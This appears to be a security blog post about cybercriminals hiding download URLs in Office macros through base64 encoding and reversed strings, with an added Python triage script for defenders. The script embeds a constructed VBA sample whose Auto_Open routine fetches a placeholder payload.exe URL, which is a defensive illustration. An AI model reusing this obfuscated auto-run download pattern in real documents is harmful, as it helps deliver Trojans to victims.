Obfuscated malicious office documents adopted by cybercriminals around the world

After going out of fashion for a number of years, malicious macros inside Office files have recently experienced a revival. And why not, especially if they are a lot cheaper than exploits and capable of doing the same job?

Yes, that’s right, cybercriminals are busily recycling this old technique, introducing new obfuscation forms to make it more effective. Let’s look at two examples.

Sample 1

This is an Excel file with malicious embedded macros. However, if you use standard Office tools to look at the macros, then depending on the version you will either see nothing malicious at all or you won't be allowed to view the macros themselves:

That is because all the strings in the sample's macros are obfuscated with base64 encoding.

After de-obfuscation you can see clearly the URLs used to download the payloads:

This is a very simple technique, but it is effective against simple heuristics that rely on string analysis of all incoming email attachments, and this is reflected in a very low VT detection rate.

This particular sample is also interesting because in some Excel versions it is able to run its macros automatically, without prompting the user to enable them. Once it has run, it drops a password-stealing Trojan directly onto the victim's system.

Sample 2

This other example is a fake Aeromexico ticket.

There is no obfuscation, but the URL is written from right to left, which again may be quite effective against simple grep-based analysis techniques:

It is interesting to note that the first sample was found in the wild in Venezuela, the second in Mexico and then the third in Brazil:

This one drops a ChePro banker. All three malicious samples drop only Trojans that steal financial data, but the same technique can be easily used to drop any type of malware.
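Both tricks described above, base64-encoded strings in Sample 1 and the right-to-left URL in Sample 2, are trivial to undo once you know to look for them. The following script is an added example for defenders, not code from the original post: it takes already-extracted VBA macro source (for instance, the text a tool such as olevba produces), decodes base64-looking string literals, reverses literals that contain a backwards `http://` marker, and reports the recovered URLs together with a few triage indicators. The macro text and the URLs in it are constructed placeholders (`.invalid` and `.example` hostnames), not indicators from the samples in the post.

```python
import base64
import binascii
import re

# Constructed sample: a VBA macro body that mimics the two tricks in the post,
# (a) a base64-encoded download URL and (b) a URL written right-to-left.
# The hostnames are reserved placeholder domains, not real indicators.
SAMPLE_MACRO = '''
Sub Auto_Open()
    Dim u As String
    u = Decode("aHR0cDovL2V4YW1wbGUuaW52YWxpZC9wYXlsb2FkLmV4ZQ==")
    Dim r As String
    r = StrReverse("exe.tekcit/elpmaxe.eciovni//:ptth")
    Call Fetch(u)
    Call Fetch(r)
End Sub
'''

URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)
# Candidate base64 blobs: long runs of the base64 alphabet plus optional padding.
B64_RE = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')
# "http://" or "https://" written backwards starts with "//:ptth" / "//:sptth".
REVERSED_URL_RE = re.compile(r'//:s?ptth', re.IGNORECASE)
# Procedure names that Office runs automatically when the document is opened.
AUTOEXEC_RE = re.compile(r'\b(Auto_Open|Workbook_Open|Document_Open|AutoOpen)\b',
                         re.IGNORECASE)


def decode_base64_candidates(text):
    """Return the printable ASCII strings hidden in base64-looking runs of text."""
    found = []
    for match in B64_RE.finditer(text):
        blob = match.group(0)
        blob += '=' * (-len(blob) % 4)          # tolerate stripped padding
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue                            # not valid base64, skip it
        try:
            decoded = raw.decode('ascii')
        except UnicodeDecodeError:
            continue                            # binary junk, not a string
        if decoded.isprintable():
            found.append(decoded)
    return found


def find_reversed_urls(text):
    """Recover URLs stored right-to-left (the kind VBA's StrReverse undoes at runtime)."""
    urls = []
    for match in re.finditer(r'"([^"]*)"', text):   # every double-quoted literal
        literal = match.group(1)
        if REVERSED_URL_RE.search(literal):
            urls.extend(URL_RE.findall(literal[::-1]))
    return urls


def extract_hidden_urls(macro_source):
    """Collect plaintext, base64-hidden and reversed URLs from macro source."""
    urls = set(URL_RE.findall(macro_source))
    for decoded in decode_base64_candidates(macro_source):
        urls.update(URL_RE.findall(decoded))
    urls.update(find_reversed_urls(macro_source))
    return sorted(urls)


def triage(macro_source):
    """Summarise why a macro deserves a closer look; fixed keys keep it easy to log."""
    return {
        "autoexec": bool(AUTOEXEC_RE.search(macro_source)),
        "base64_strings": len(decode_base64_candidates(macro_source)),
        "reversed_urls": len(find_reversed_urls(macro_source)),
        "urls": extract_hidden_urls(macro_source),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

The point of the script is the one the post makes: a string-matching filter that only grep-searches attachments for `http` never sees either URL, while a few lines of normalisation (decode, reverse, then match) do. In practice you would run this over the macro text of every attachment at the mail gateway and alert on the combination of an auto-execute procedure with obfuscated strings, rather than on any single indicator.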

So does this mean that only Latin American cybercriminals use this technique? The answer is no, not really. Our relative user infection statistics show that the countries with the most attempted infections using this kind of malware are actually Germany, followed by Poland.

However, the technique is seen elsewhere, including Spain, Mexico, Brazil and others.

While analyzing malicious macro-enabled Office files, you can see that the original document is created by one user and then somebody else (another criminal) assists in embedding the malicious macros.

The same technique can easily be used to drop any kind of malware in any country, since this is all about social engineering, and it will easily pass through email gateway security because it is basically an Office document, and email security policies allow those.

You may follow me on twitter: @dimitribest
